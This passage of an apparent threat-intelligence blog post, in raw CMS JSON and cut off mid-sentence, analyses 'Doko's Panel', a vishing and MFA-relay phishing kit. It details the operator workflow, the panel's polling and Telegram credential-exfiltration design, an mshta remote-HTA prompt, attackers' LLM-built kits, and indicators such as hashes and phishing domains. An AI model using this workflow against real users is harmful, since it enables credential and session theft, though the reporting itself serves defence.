",{"data":10809,"content":10811,"nodeType":883},{"uri":10810},"https://www.bleepingcomputer.com/news/security/new-blackfile-extortion-gang-targets-retail-and-hospitality-orgs/",[10812],{"data":10813,"marks":10814,"value":10815,"nodeType":864},{},[],"BlackFile",{"data":10817,"marks":10818,"value":10819,"nodeType":864},{},[]," hacking group, with a significant overlap in techniques and tooling. ",{"data":10821,"content":10822,"nodeType":860},{},[10823,10828],{"data":10824,"marks":10825,"value":10827,"nodeType":864},{},[10826],{"type":899},"We’ve directly accessed active deployments of the operator panels driving these campaigns, observed what happens in real-time when a victim is targeted, and analyzed multiple variants and forks of the tooling. ",{"data":10829,"marks":10830,"value":1171,"nodeType":864},{},[],{"data":10832,"content":10833,"nodeType":860},{},[10834],{"data":10835,"marks":10836,"value":10837,"nodeType":864},{},[],"We identified four primary infrastructure clusters, with each deployment having its own panel implementation. While the panels share common heritage, the operators deploying them appear to be separate groups with different infrastructure preferences and operational patterns.",{"data":10839,"content":10843,"nodeType":996},{"target":10840},{"sys":10841},{"id":10842,"type":1001,"linkType":1002},"5BQOpzjSbobLx8OkvXl6os",[],{"data":10845,"content":10846,"nodeType":860},{},[10847,10851],{"data":10848,"marks":10849,"value":10850,"nodeType":864},{},[],"The existence of these independently branded forks indicates that the tooling has entered a phase of wider distribution — operators who obtained the original panel source are now customizing and reshipping it for their own purposes. As a result, the tooling is now most likely accessible to a broad population of financially motivated threat actors. ",{"data":10852,"marks":10853,"value":10855,"nodeType":864},{},[10854],{"type":899},"In total, we’ve identified over 400 domains linked to the attacks, giving an indication of the scale. ",{"data":10857,"content":10861,"nodeType":996},{"target":10858},{"sys":10859},{"id":10860,"type":1001,"linkType":1002},"2Z1LUdYXVONWO9nnJTkWsJ",[],{"data":10863,"content":10864,"nodeType":1005},{},[],{"data":10866,"content":10867,"nodeType":1009},{},[10868],{"data":10869,"marks":10870,"value":10872,"nodeType":864},{},[10871],{"type":899},"Background",{"data":10874,"content":10875,"nodeType":860},{},[10876],{"data":10877,"marks":10878,"value":10879,"nodeType":864},{},[],"Since at least August 2025, attackers have been running hybrid social engineering campaigns targeting hundreds of organizations across financial services, technology, cryptocurrency, healthcare, hospitality, and private aviation. ",{"data":10881,"content":10882,"nodeType":941},{},[10883,10898,10913,10928],{"data":10884,"content":10885,"nodeType":945},{},[10886],{"data":10887,"content":10888,"nodeType":860},{},[10889,10894],{"data":10890,"marks":10891,"value":10893,"nodeType":864},{},[10892],{"type":899},"August 2025: ",{"data":10895,"marks":10896,"value":10897,"nodeType":864},{},[],"Tooling made available, used in crypto-focused attacks",{"data":10899,"content":10900,"nodeType":945},{},[10901],{"data":10902,"content":10903,"nodeType":860},{},[10904,10909],{"data":10905,"marks":10906,"value":10908,"nodeType":864},{},[10907],{"type":899},"November 2025:",{"data":10910,"marks":10911,"value":10912,"nodeType":864},{},[]," Major attacks on enterprise identity platforms begin",{"data":10914,"content":10915,"nodeType":945},{},[10916],{"data":10917,"content":10918,"nodeType":860},{},[10919,10924],{"data":10920,"marks":10921,"value":10923,"nodeType":864},{},[10922],{"type":899},"January 2026: ",{"data":10925,"marks":10926,"value":10927,"nodeType":864},{},[],"Public breaches reported",{"data":10929,"content":10930,"nodeType":945},{},[10931],{"data":10932,"content":10933,"nodeType":860},{},[10934,10939],{"data":10935,"marks":10936,"value":10938,"nodeType":864},{},[10937],{"type":899},"March 2026: ",{"data":10940,"marks":10941,"value":10942,"nodeType":864},{},[],"Activity spikes again",{"data":10944,"content":10945,"nodeType":860},{},[10946],{"data":10947,"marks":10948,"value":10949,"nodeType":864},{},[],"The attacks combine voice phishing with MFA-bypassing adversary-in-the-middle (AiTM) phishing mechanisms that allow the attacker to steal authenticated sessions for target applications — typically enterprise identity providers and cryptocurrency exchanges. Once an identity provider account is compromised, the attackers pivot across connected SaaS platforms — SharePoint, Salesforce, DocuSign, Slack — exfiltrates data, and attempts to extort the victim organization. ",{"data":10951,"content":10955,"nodeType":996},{"target":10952},{"sys":10953},{"id":10954,"type":1001,"linkType":1002},"2X2YXMpozrbRQhegk7yF1k",[],{"data":10957,"content":10958,"nodeType":1005},{},[],{"data":10960,"content":10961,"nodeType":1009},{},[10962],{"data":10963,"marks":10964,"value":10966,"nodeType":864},{},[10965],{"type":899},"Inside the panels: what Push found",{"data":10968,"content":10969,"nodeType":860},{},[10970],{"data":10971,"marks":10972,"value":10973,"nodeType":864},{},[],"Push detected an active Okta phishing site with TTPs aligned to the tooling used by SLH and affiliated groups. Through analysis of the phishing infrastructure, we gained direct access to Doko’s Panel and variants, and were able to observe how these attacks unfold from the operator's perspective — including real victim submission logs from the current week confirming ongoing active operations.",{"data":10975,"content":10979,"nodeType":996},{"target":10976},{"sys":10977},{"id":10978,"type":1001,"linkType":1002},"5ND0etPs5xN7ejz24l71jy",[],{"data":10981,"content":10982,"nodeType":1312},{},[10983],{"data":10984,"marks":10985,"value":10987,"nodeType":864},{},[10986],{"type":899},"How the attack works",{"data":10989,"content":10990,"nodeType":860},{},[10991],{"data":10992,"marks":10993,"value":10994,"nodeType":864},{},[],"The general sequence of steps is the same across the panels:",{"data":10996,"content":10997,"nodeType":941},{},[10998,11013,11028,11052,11067,11082,11106],{"data":10999,"content":11000,"nodeType":945},{},[11001],{"data":11002,"content":11003,"nodeType":860},{},[11004,11009],{"data":11005,"marks":11006,"value":11008,"nodeType":864},{},[11007],{"type":899},"The operator calls the target",{"data":11010,"marks":11011,"value":11012,"nodeType":864},{},[]," spoofing the organization's IT helpdesk number, often referencing real employee names or internal ticket numbers to establish trust. The target is directed to a phishing domain — usually following a combosquatting pattern like my\u003Ctarget>internal[.]com or \u003Ctarget>sso[.]com — under the pretext of a mandatory security update, passkey enrollment, or support ticket resolution. ",{"data":11014,"content":11015,"nodeType":945},{},[11016],{"data":11017,"content":11018,"nodeType":860},{},[11019,11024],{"data":11020,"marks":11021,"value":11023,"nodeType":864},{},[11022],{"type":899},"The victim lands on the phishing domain",{"data":11025,"marks":11026,"value":11027,"nodeType":864},{},[]," and is presented with a loading spinner — the anti-bot gate that prevents unauthorized access to the phishing pages.",{"data":11029,"content":11030,"nodeType":945},{},[11031],{"data":11032,"content":11033,"nodeType":860},{},[11034,11039,11043,11048],{"data":11035,"marks":11036,"value":11038,"nodeType":864},{},[11037],{"type":899},"The operator accepts the visitor",{"data":11040,"marks":11041,"value":11042,"nodeType":864},{},[]," from the admin panel and ",{"data":11044,"marks":11045,"value":11047,"nodeType":864},{},[11046],{"type":899},"the victim is redirected",{"data":11049,"marks":11050,"value":11051,"nodeType":864},{},[]," to the cloned login page (e.g. Google, Microsoft, Okta).",{"data":11053,"content":11054,"nodeType":945},{},[11055],{"data":11056,"content":11057,"nodeType":860},{},[11058,11063],{"data":11059,"marks":11060,"value":11062,"nodeType":864},{},[11061],{"type":899},"The victim enters their email address and password",{"data":11064,"marks":11065,"value":11066,"nodeType":864},{},[],", which is forwarded to the operator's Telegram channel. The victim sees a processing spinner on the branded login form.",{"data":11068,"content":11069,"nodeType":945},{},[11070],{"data":11071,"content":11072,"nodeType":860},{},[11073,11078],{"data":11074,"marks":11075,"value":11077,"nodeType":864},{},[11076],{"type":899},"The operator relays the credentials",{"data":11079,"marks":11080,"value":11081,"nodeType":864},{},[]," to the real identity provider. If they're valid, the attack proceeds. If they're invalid, the operator can redirect the victim back to the credential entry pages. Assuming MFA is required, the operator issues a redirect to an appropriate MFA capture page — \"Submit SMS OTP,\" \"Submit Gauth OTP,\" or \"Approve [XX] Prompt,\" depending on what the legitimate IdP is presenting.",{"data":11083,"content":11084,"nodeType":945},{},[11085],{"data":11086,"content":11087,"nodeType":860},{},[11088,11093,11097,11102],{"data":11089,"marks":11090,"value":11092,"nodeType":864},{},[11091],{"type":899},"The victim submits their OTP or approves the push notification ",{"data":11094,"marks":11095,"value":11096,"nodeType":864},{},[],"and",{"data":11098,"marks":11099,"value":11101,"nodeType":864},{},[11100],{"type":899}," the operator relays the OTP",{"data":11103,"marks":11104,"value":11105,"nodeType":864},{},[]," in their own login session, completes authentication, and captures the session. ",{"data":11107,"content":11108,"nodeType":945},{},[11109],{"data":11110,"content":11111,"nodeType":860},{},[11112,11117],{"data":11113,"marks":11114,"value":11116,"nodeType":864},{},[11115],{"type":899},"The victim is redirected to a benign page",{"data":11118,"marks":11119,"value":11120,"nodeType":864},{},[]," (e.g., Google Drive) or to a support ticket closure screen displaying a fabricated ticket number.",{"data":11122,"content":11126,"nodeType":996},{"target":11123},{"sys":11124},{"id":11125,"type":1001,"linkType":1002},"1o0wm3EOd7zSl5MddsNxgL",[],{"data":11128,"content":11132,"nodeType":996},{"target":11129},{"sys":11130},{"id":11131,"type":1001,"linkType":1002},"7w7SQEn3aITpcgXLMThhbS",[],{"data":11134,"content":11135,"nodeType":860},{},[11136],{"data":11137,"marks":11138,"value":21,"nodeType":864},{},[],{"data":11140,"content":11144,"nodeType":996},{"target":11141},{"sys":11142},{"id":11143,"type":1001,"linkType":1002},"PJJabY1ZfoCfl8XQ6PMj2",[],{"data":11146,"content":11147,"nodeType":1312},{},[11148],{"data":11149,"marks":11150,"value":11152,"nodeType":864},{},[11151],{"type":899},"Doko’s Panel",{"data":11154,"content":11155,"nodeType":860},{},[11156],{"data":11157,"marks":11158,"value":11159,"nodeType":864},{},[],"Let’s take a closer look at the panels themselves. We'll start with the default version of Doko's Panel since it’s the most established. It provides a multi-functional framework targeting users of Google, Microsoft Entra, Okta, and popular cryptocurrency exchanges including Abra, Coinbase, Gemini, and Kraken. Its core functionality resides in a client-side JavaScript file (client.js) that establishes the real-time feedback loop between the victim's browser and the operator's C2.",{"data":11161,"content":11162,"nodeType":860},{},[11163],{"data":11164,"marks":11165,"value":11166,"nodeType":864},{},[],"The technical indicators that characterize Doko's Panel in its standard form include:",{"data":11168,"content":11169,"nodeType":941},{},[11170,11185,11200,11215],{"data":11171,"content":11172,"nodeType":945},{},[11173],{"data":11174,"content":11175,"nodeType":860},{},[11176,11181],{"data":11177,"marks":11178,"value":11180,"nodeType":864},{},[11179],{"type":899},"client.js",{"data":11182,"marks":11183,"value":11184,"nodeType":864},{},[]," containing a pingServer() function that sends a JSON POST request to /backend.php every second with the structure { action: 'ping', token, window_id, page, os, browser }. If the response contains a redirect key, the victim's browser navigates to that path. ",{"data":11186,"content":11187,"nodeType":945},{},[11188],{"data":11189,"content":11190,"nodeType":860},{},[11191,11196],{"data":11192,"marks":11193,"value":11195,"nodeType":864},{},[11194],{"type":899},"sendTelegramMessage()",{"data":11197,"marks":11198,"value":11199,"nodeType":864},{},[]," (aliased to sendtg()), a function for relaying real-time credential submissions and session updates to the operator's Telegram channel.",{"data":11201,"content":11202,"nodeType":945},{},[11203],{"data":11204,"content":11205,"nodeType":860},{},[11206,11211],{"data":11207,"marks":11208,"value":11210,"nodeType":864},{},[11209],{"type":899},"backend.php",{"data":11212,"marks":11213,"value":11214,"nodeType":864},{},[]," as the primary server-side handler for both victim ping actions and admin panel operations (retrieving connected victim information, sending redirect instructions).",{"data":11216,"content":11217,"nodeType":945},{},[11218],{"data":11219,"content":11220,"nodeType":860},{},[11221,11226],{"data":11222,"marks":11223,"value":11225,"nodeType":864},{},[11224],{"type":899},"j.php",{"data":11227,"marks":11228,"value":11229,"nodeType":864},{},[]," as the endpoint for sending Telegram messages, relaying captured credentials and session logs.",{"data":11231,"content":11232,"nodeType":860},{},[11233],{"data":11234,"marks":11235,"value":11236,"nodeType":864},{},[],"Push found that deployments of Doko's Panel had minimal security by default — anyone was able to view the admin panel and manage visitors' connections without authentication.",{"data":11238,"content":11242,"nodeType":996},{"target":11239},{"sys":11240},{"id":11241,"type":1001,"linkType":1002},"3glwGSGHdCpf3DLqNmQqN8",[],{"data":11244,"content":11248,"nodeType":996},{"target":11245},{"sys":11246},{"id":11247,"type":1001,"linkType":1002},"20ymWIXMkmJlw7XYb93c9o",[],{"data":11250,"content":11251,"nodeType":1312},{},[11252],{"data":11253,"marks":11254,"value":11256,"nodeType":864},{},[11255],{"type":899},"Panel proliferation and remixes",{"data":11258,"content":11259,"nodeType":860},{},[11260],{"data":11261,"marks":11262,"value":11263,"nodeType":864},{},[],"Access to Doko's Panel has clearly proliferated beyond its original developers, resulting in remixes and variants being distributed across the ecosystem. Push identified a variant titled \"Lord Mensius's Panel\" targeting Koinly (a cryptocurrency tax platform), and another titled \"$$$\" using a template impersonating the Australian Tax Office, also targeting cryptocurrency tax filing. ",{"data":11265,"content":11266,"nodeType":860},{},[11267],{"data":11268,"marks":11269,"value":11270,"nodeType":864},{},[],"The existence of these independently branded forks indicates that the tooling has entered a phase of wider distribution — operators who obtained the original panel source are now customizing and reshipping it for their own purposes. As a result, the tooling is now accessible to a broad population of financially motivated threat actors. ",{"data":11272,"content":11273,"nodeType":1312},{},[11274],{"data":11275,"marks":11276,"value":11278,"nodeType":864},{},[11277],{"type":899},"heartbeat/check_redirect variant",{"data":11280,"content":11281,"nodeType":860},{},[11282],{"data":11283,"marks":11284,"value":11285,"nodeType":864},{},[],"In addition to Doko’s Panel and its forks, the site initially detected by Push used a modified variant of Doko's Panel with a different C2 protocol. Rather than the standard ping action, this variant sent two types of regular requests from client.js to the backend:",{"data":11287,"content":11288,"nodeType":941},{},[11289,11304],{"data":11290,"content":11291,"nodeType":945},{},[11292],{"data":11293,"content":11294,"nodeType":860},{},[11295,11300],{"data":11296,"marks":11297,"value":11299,"nodeType":864},{},[11298],{"type":899},"Heartbeat",{"data":11301,"marks":11302,"value":11303,"nodeType":864},{},[]," — POST to backend.php with action=heartbeat along with page, token, and window_id.",{"data":11305,"content":11306,"nodeType":945},{},[11307],{"data":11308,"content":11309,"nodeType":860},{},[11310,11315],{"data":11311,"marks":11312,"value":11314,"nodeType":864},{},[11313],{"type":899},"Check Redirect",{"data":11316,"marks":11317,"value":11318,"nodeType":864},{},[]," — GET to backend.php with parameters action=check_redirect along with token and window_id.",{"data":11320,"content":11321,"nodeType":860},{},[11322],{"data":11323,"marks":11324,"value":11325,"nodeType":864},{},[],"A redirect instruction in response to either request causes the victim's browser to navigate to the specified page. The variant compounds this with a separate inline script embedded in the landing gate HTML — in addition to client.js — that schedules its own sendHeartbeat() and checkRedirect() functions on regular intervals. ",{"data":11327,"content":11331,"nodeType":996},{"target":11328},{"sys":11329},{"id":11330,"type":1001,"linkType":1002},"6zRc9ublZvEQCxcWtMBSnF",[],{"data":11333,"content":11334,"nodeType":860},{},[11335],{"data":11336,"marks":11337,"value":11338,"nodeType":864},{},[],"Additional technical differentiators for this variant include:",{"data":11340,"content":11341,"nodeType":941},{},[11342,11357,11372],{"data":11343,"content":11344,"nodeType":945},{},[11345],{"data":11346,"content":11347,"nodeType":860},{},[11348,11353],{"data":11349,"marks":11350,"value":11352,"nodeType":864},{},[11351],{"type":899},"UUID generation",{"data":11354,"marks":11355,"value":11356,"nodeType":864},{},[]," using Math.random() to replace x in the template xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx, rather than the original Doko's Panel method of constructing a template from [1e7]+-1e3+-4e3+-8e3+-1e11 and replacing [018].",{"data":11358,"content":11359,"nodeType":945},{},[11360],{"data":11361,"content":11362,"nodeType":860},{},[11363,11368],{"data":11364,"marks":11365,"value":11367,"nodeType":864},{},[11366],{"type":899},"No central Telegram sending function",{"data":11369,"marks":11370,"value":11371,"nodeType":864},{},[],", though j.php still exists and is called from inline scripts on individual phishing pages.",{"data":11373,"content":11374,"nodeType":945},{},[11375],{"data":11376,"content":11377,"nodeType":860},{},[11378,11383],{"data":11379,"marks":11380,"value":11382,"nodeType":864},{},[11381],{"type":899},"No use of FNV-1a",{"data":11384,"marks":11385,"value":11386,"nodeType":864},{},[]," to hash-generate the window ID.",{"data":11388,"content":11389,"nodeType":860},{},[11390],{"data":11391,"marks":11392,"value":11393,"nodeType":864},{},[],"Push also found sub-variants hosting Okta phishing pages with additional modifications: a minified client.js script, and a renamed backend endpoint (api_FyekIDWY.php replacing backend.php).",{"data":11395,"content":11396,"nodeType":1312},{},[11397],{"data":11398,"marks":11399,"value":11401,"nodeType":864},{},[11400],{"type":899},"Revamped admin panel",{"data":11403,"content":11404,"nodeType":860},{},[11405],{"data":11406,"marks":11407,"value":11408,"nodeType":864},{},[],"Push also found examples of a significantly revamped admin panel, including a version from April 2026 specifically targeting Microsoft as an enterprise identity provider. ",{"data":11410,"content":11414,"nodeType":996},{"target":11411},{"sys":11412},{"id":11413,"type":1001,"linkType":1002},"3ufb4cotpg0f7yoIQJnND0",[],{"data":11416,"content":11417,"nodeType":860},{},[11418],{"data":11419,"marks":11420,"value":11421,"nodeType":864},{},[],"This panel featured a more sophisticated operator interface with an updated look, quick action buttons, and sound notifications.",{"data":11423,"content":11424,"nodeType":860},{},[11425],{"data":11426,"marks":11427,"value":11428,"nodeType":864},{},[],"In addition to the standard compromise flow for acquiring email, password, and OTP, this panel provided operator actions for sending Microsoft Teams call instructions to the victim — a Meeting ID and Passcode rendered on a branded page. This capability likely enables further interaction through a channel that supports screensharing, extending the attacker's reach beyond credential theft into live session manipulation. It also has the potential to make the scenario more believable for the victim.",{"data":11430,"content":11434,"nodeType":996},{"target":11431},{"sys":11432},{"id":11433,"type":1001,"linkType":1002},"4pg65d1SvTJA3xm6AsxZBp",[],{"data":11436,"content":11437,"nodeType":860},{},[11438],{"data":11439,"marks":11440,"value":11441,"nodeType":864},{},[],"Other capabilities were referenced in the panel's source code but did not appear active in the observed deployment:",{"data":11443,"content":11444,"nodeType":941},{},[11445,11460],{"data":11446,"content":11447,"nodeType":945},{},[11448],{"data":11449,"content":11450,"nodeType":860},{},[11451,11456],{"data":11452,"marks":11453,"value":11455,"nodeType":864},{},[11454],{"type":899},"Additional MFA approval pages",{"data":11457,"marks":11458,"value":11459,"nodeType":864},{},[]," for Duo and Okta, with the operator providing a code to display to the victim.",{"data":11461,"content":11462,"nodeType":945},{},[11463],{"data":11464,"content":11465,"nodeType":860},{},[11466,11471],{"data":11467,"marks":11468,"value":11470,"nodeType":864},{},[11469],{"type":899},"A code execution prompt",{"data":11472,"marks":11473,"value":11474,"nodeType":864},{},[]," to instruct the victim to run a command — the placeholder example being mshta to execute a remote HTA file, suggesting a potential bridge from identity compromise into malware delivery.",{"data":11476,"content":11477,"nodeType":860},{},[11478],{"data":11479,"marks":11480,"value":11481,"nodeType":864},{},[],"The admin panel also included settings for restricting access to specific geographic locations and device types, allowing operators to refine their campaign targeting and also avoid detection from unusual devices (often an indicator that the visitor is not a real human and is actually a security tool or bot).",{"data":11483,"content":11487,"nodeType":996},{"target":11484},{"sys":11485},{"id":11486,"type":1001,"linkType":1002},"1hebGtxbkyuejWXczwx5n6",[],{"data":11489,"content":11490,"nodeType":1005},{},[],{"data":11492,"content":11493,"nodeType":1009},{},[11494],{"data":11495,"marks":11496,"value":11498,"nodeType":864},{},[11497],{"type":899},"LLM-generated tells: vibe-coded phishing infrastructure",{"data":11500,"content":11501,"nodeType":860},{},[11502],{"data":11503,"marks":11504,"value":11505,"nodeType":864},{},[],"Evidence of extensive LLM use is extremely prevalent in attacks detected by Push, from LLM-generated phishing kits and tools to vibe-coded cloned pages. Attackers have also been observed leveraging AI–assisted capabilities in SaaS platforms to automate and scale-up their campaigns from an infrastructure and operations perspective. ",{"data":11507,"content":11508,"nodeType":860},{},[11509],{"data":11510,"marks":11511,"value":11512,"nodeType":864},{},[],"The ‘heartbeat’ variant in particular has significant tells of heavy use of LLMs to modify the phishing panel for the operator’s needs. The fact that these are so blatant increases the belief that these tools are being vibe-coded by relatively inexperienced developers with limited regard for operational security.",{"data":11514,"content":11515,"nodeType":860},{},[11516],{"data":11517,"marks":11518,"value":11519,"nodeType":864},{},[],"Some versions of client.js begin with verbose header comments that no human developer would write:",{"data":11521,"content":11524,"nodeType":996},{"target":11522},{"sys":11523},{"id":7797,"type":1001,"linkType":1002},[],{"data":11526,"content":11527,"nodeType":860},{},[11528],{"data":11529,"marks":11530,"value":11531,"nodeType":864},{},[],"The \"NOTES FOR NEXT SESSION\" header is particularly telling — it's a pattern generated by LLMs that maintain context between chat sessions, not a convention any human developer would adopt in production code, let alone in a phishing kit where operational security should discourage self-documenting infrastructure.",{"data":11533,"content":11534,"nodeType":860},{},[11535],{"data":11536,"marks":11537,"value":11538,"nodeType":864},{},[],"The admin panel HTML contains similarly over-documented opening comments:",{"data":11540,"content":11544,"nodeType":996},{"target":11541},{"sys":11542},{"id":11543,"type":1001,"linkType":1002},"60snRhz0RIsvLI6OU9RDOk",[],{"data":11546,"content":11547,"nodeType":860},{},[11548],{"data":11549,"marks":11550,"value":11551,"nodeType":864},{},[],"One of the Okta cloned login pages observed by Push contained the following comments suggesting the use of an LLM to create the clone:",{"data":11553,"content":11557,"nodeType":996},{"target":11554},{"sys":11555},{"id":11556,"type":1001,"linkType":1002},"1WCd5LQ6cfPf1IsNAhPSIT",[],{"data":11559,"content":11560,"nodeType":860},{},[11561],{"data":11562,"marks":11563,"value":11564,"nodeType":864},{},[],"The cloned Microsoft login pages displayed previously contain terser comments, but still typical of useless comments that are included by an LLM rather than a human author, especially a malware/phishing author:",{"data":11566,"content":11570,"nodeType":996},{"target":11567},{"sys":11568},{"id":11569,"type":1001,"linkType":1002},"6WN59mkiscNmAt8dmOR81c",[],{"data":11572,"content":11573,"nodeType":860},{},[11574],{"data":11575,"marks":11576,"value":11577,"nodeType":864},{},[],"The broken duplication in the heartbeat variant — where an inline script and client.js independently schedule the same backend requests using slightly different data formats — is consistent with an operator pasting requirements into an LLM and accepting the output without understanding the existing codebase well enough to recognize the redundancy.",{"data":11579,"content":11580,"nodeType":860},{},[11581],{"data":11582,"marks":11583,"value":11584,"nodeType":864},{},[],"Clearly, the barrier to entry for building (or forking) and operating a real-time vishing phishing panel is lower than the effectiveness of the tooling might suggest.",{"data":11586,"content":11587,"nodeType":1005},{},[],{"data":11589,"content":11590,"nodeType":1009},{},[11591],{"data":11592,"marks":11593,"value":11595,"nodeType":864},{},[11594],{"type":899},"Infrastructure clustering and attribution",{"data":11597,"content":11598,"nodeType":860},{},[11599,11603,11608],{"data":11600,"marks":11601,"value":11602,"nodeType":864},{},[],"Through analysis of phishing domains, hosting infrastructure, and technical indicators in the panel source code, ",{"data":11604,"marks":11605,"value":11607,"nodeType":864},{},[11606],{"type":899},"we’re highlighting four distinct infrastructure clusters associated with this tooling. ",{"data":11609,"marks":11610,"value":11611,"nodeType":864},{},[],"While the panels share common heritage, the operators deploying them appear to be separate groups with different infrastructure preferences and operational patterns.",{"data":11613,"content":11614,"nodeType":1312},{},[11615],{"data":11616,"marks":11617,"value":11618,"nodeType":864},{},[],"Cluster A",{"data":11620,"content":11621,"nodeType":860},{},[11622,11626,11635],{"data":11623,"marks":11624,"value":11625,"nodeType":864},{},[],"The indicators for Cluster A overlap with ",{"data":11627,"content":11629,"nodeType":883},{"uri":11628},"https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft",[11630],{"data":11631,"marks":11632,"value":11634,"nodeType":864},{},[11633],{"type":1455},"Mandiant’s reporting on UNC6661",{"data":11636,"marks":11637,"value":11638,"nodeType":864},{},[],". Mandiant also attributes the extortion activity following UNC6661 intrusions to UNC6240, aka ShinyHunters.",{"data":11640,"content":11641,"nodeType":4845},{},[11642,11666,11695,11718,11769,11813,11836,11859],{"data":11643,"content":11644,"nodeType":4581},{},[11645,11656],{"data":11646,"content":11647,"nodeType":4569},{},[11648],{"data":11649,"content":11650,"nodeType":860},{},[11651],{"data":11652,"marks":11653,"value":11655,"nodeType":864},{},[11654],{"type":899},"Tool",{"data":11657,"content":11658,"nodeType":4569},{},[11659],{"data":11660,"content":11661,"nodeType":860},{},[11662],{"data":11663,"marks":11664,"value":11152,"nodeType":864},{},[11665],{"type":899},{"data":11667,"content":11668,"nodeType":4581},{},[11669,11678],{"data":11670,"content":11671,"nodeType":4569},{},[11672],{"data":11673,"content":11674,"nodeType":860},{},[11675],{"data":11676,"marks":11677,"value":11180,"nodeType":864},{},[],{"data":11679,"content":11680,"nodeType":4569},{},[11681,11688],{"data":11682,"content":11683,"nodeType":860},{},[11684],{"data":11685,"marks":11686,"value":11687,"nodeType":864},{},[],"8a01bcb70ec1c101a163c9cb8e074781c1322096f7ae01789f02252854def44c",{"data":11689,"content":11690,"nodeType":860},{},[11691],{"data":11692,"marks":11693,"value":11694,"nodeType":864},{},[],"f574b6e6b3a968cda5f51bec2c090d8eb095fbcfc383314f94bc15676a0d6692",{"data":11696,"content":11697,"nodeType":4581},{},[11698,11708],{"data":11699,"content":11700,"nodeType":4569},{},[11701],{"data":11702,"content":11703,"nodeType":860},{},[11704],{"data":11705,"marks":11706,"value":11707,"nodeType":864},{},[],"Timeframe",{"data":11709,"content":11710,"nodeType":4569},{},[11711],{"data":11712,"content":11713,"nodeType":860},{},[11714],{"data":11715,"marks":11716,"value":11717,"nodeType":864},{},[],"November 2025 - present (April 2026)",{"data":11719,"content":11720,"nodeType":4581},{},[11721,11731],{"data":11722,"content":11723,"nodeType":4569},{},[11724],{"data":11725,"content":11726,"nodeType":860},{},[11727],{"data":11728,"marks":11729,"value":11730,"nodeType":864},{},[],"Domain Patterns",{"data":11732,"content":11733,"nodeType":4569},{},[11734,11741,11748,11755,11762],{"data":11735,"content":11736,"nodeType":860},{},[11737],{"data":11738,"marks":11739,"value":11740,"nodeType":864},{},[],"\u003Ctarget>internal.com\n\u003Ctarget>sso.com",{"data":11742,"content":11743,"nodeType":860},{},[11744],{"data":11745,"marks":11746,"value":11747,"nodeType":864},{},[],"my\u003Ctarget>.com",{"data":11749,"content":11750,"nodeType":860},{},[11751],{"data":11752,"marks":11753,"value":11754,"nodeType":864},{},[],"my\u003Ctarget>internal.com",{"data":11756,"content":11757,"nodeType":860},{},[11758],{"data":11759,"marks":11760,"value":11761,"nodeType":864},{},[],"my\u003Ctarget>manager.com",{"data":11763,"content":11764,"nodeType":860},{},[11765],{"data":11766,"marks":11767,"value":11768,"nodeType":864},{},[],"my\u003Ctarget>sso.com",{"data":11770,"content":11771,"nodeType":4581},{},[11772,11782],{"data":11773,"content":11774,"nodeType":4569},{},[11775],{"data":11776,"content":11777,"nodeType":860},{},[11778],{"data":11779,"marks":11780,"value":11781,"nodeType":864},{},[],"Examples",{"data":11783,"content":11784,"nodeType":4569},{},[11785,11792,11799,11806],{"data":11786,"content":11787,"nodeType":860},{},[11788],{"data":11789,"marks":11790,"value":11791,"nodeType":864},{},[],"mydropboxinternal.com (November 2025)",{"data":11793,"content":11794,"nodeType":860},{},[11795],{"data":11796,"marks":11797,"value":11798,"nodeType":864},{},[],"myxerointernal.com (December 2025)",{"data":11800,"content":11801,"nodeType":860},{},[11802],{"data":11803,"marks":11804,"value":11805,"nodeType":864},{},[],"amazoninternal.com (March 2026)",{"data":11807,"content":11808,"nodeType":860},{},[11809],{"data":11810,"marks":11811,"value":11812,"nodeType":864},{},[],"mydisneysso.com (March 2026)",{"data":11814,"content":11815,"nodeType":4581},{},[11816,11826],{"data":11817,"content":11818,"nodeType":4569},{},[11819],{"data":11820,"content":11821,"nodeType":860},{},[11822],{"data":11823,"marks":11824,"value":11825,"nodeType":864},{},[],"Registrar",{"data":11827,"content":11828,"nodeType":4569},{},[11829],{"data":11830,"content":11831,"nodeType":860},{},[11832],{"data":11833,"marks":11834,"value":11835,"nodeType":864},{},[],"NiceNIC",{"data":11837,"content":11838,"nodeType":4581},{},[11839,11849],{"data":11840,"content":11841,"nodeType":4569},{},[11842],{"data":11843,"content":11844,"nodeType":860},{},[11845],{"data":11846,"marks":11847,"value":11848,"nodeType":864},{},[],"Name Servers",{"data":11850,"content":11851,"nodeType":4569},{},[11852],{"data":11853,"content":11854,"nodeType":860},{},[11855],{"data":11856,"marks":11857,"value":11858,"nodeType":864},{},[],"1984.is FreeDNS",{"data":11860,"content":11861,"nodeType":4581},{},[11862,11872],{"data":11863,"content":11864,"nodeType":4569},{},[11865],{"data":11866,"content":11867,"nodeType":860},{},[11868],{"data":11869,"marks":11870,"value":11871,"nodeType":864},{},[],"Hosting Provider",{"data":11873,"content":11874,"nodeType":4569},{},[11875],{"data":11876,"content":11877,"nodeType":860},{},[11878],{"data":11879,"marks":11880,"value":11881,"nodeType":864},{},[],"Mevspace (AS201814)",{"data":11883,"content":11884,"nodeType":1312},{},[11885],{"data":11886,"marks":11887,"value":11888,"nodeType":864},{},[],"Cluster B",{"data":11890,"content":11891,"nodeType":860},{},[11892,11896,11904,11907,11916],{"data":11893,"marks":11894,"value":11895,"nodeType":864},{},[],"The indicators for Cluster B overlap with ",{"data":11897,"content":11898,"nodeType":883},{"uri":11628},[11899],{"data":11900,"marks":11901,"value":11903,"nodeType":864},{},[11902],{"type":1455},"Mandiant’s reporting on UNC6671",{"data":11905,"marks":11906,"value":1774,"nodeType":864},{},[],{"data":11908,"content":11910,"nodeType":883},{"uri":11909},"https://rhisac.org/threat-intelligence/extortion-in-the-enterprise-defending-against-blackfile-attacks/",[11911],{"data":11912,"marks":11913,"value":11915,"nodeType":864},{},[11914],{"type":1455},"Other external reporting",{"data":11917,"marks":11918,"value":11919,"nodeType":864},{},[]," has linked this group to BlackFile-branded extortion and 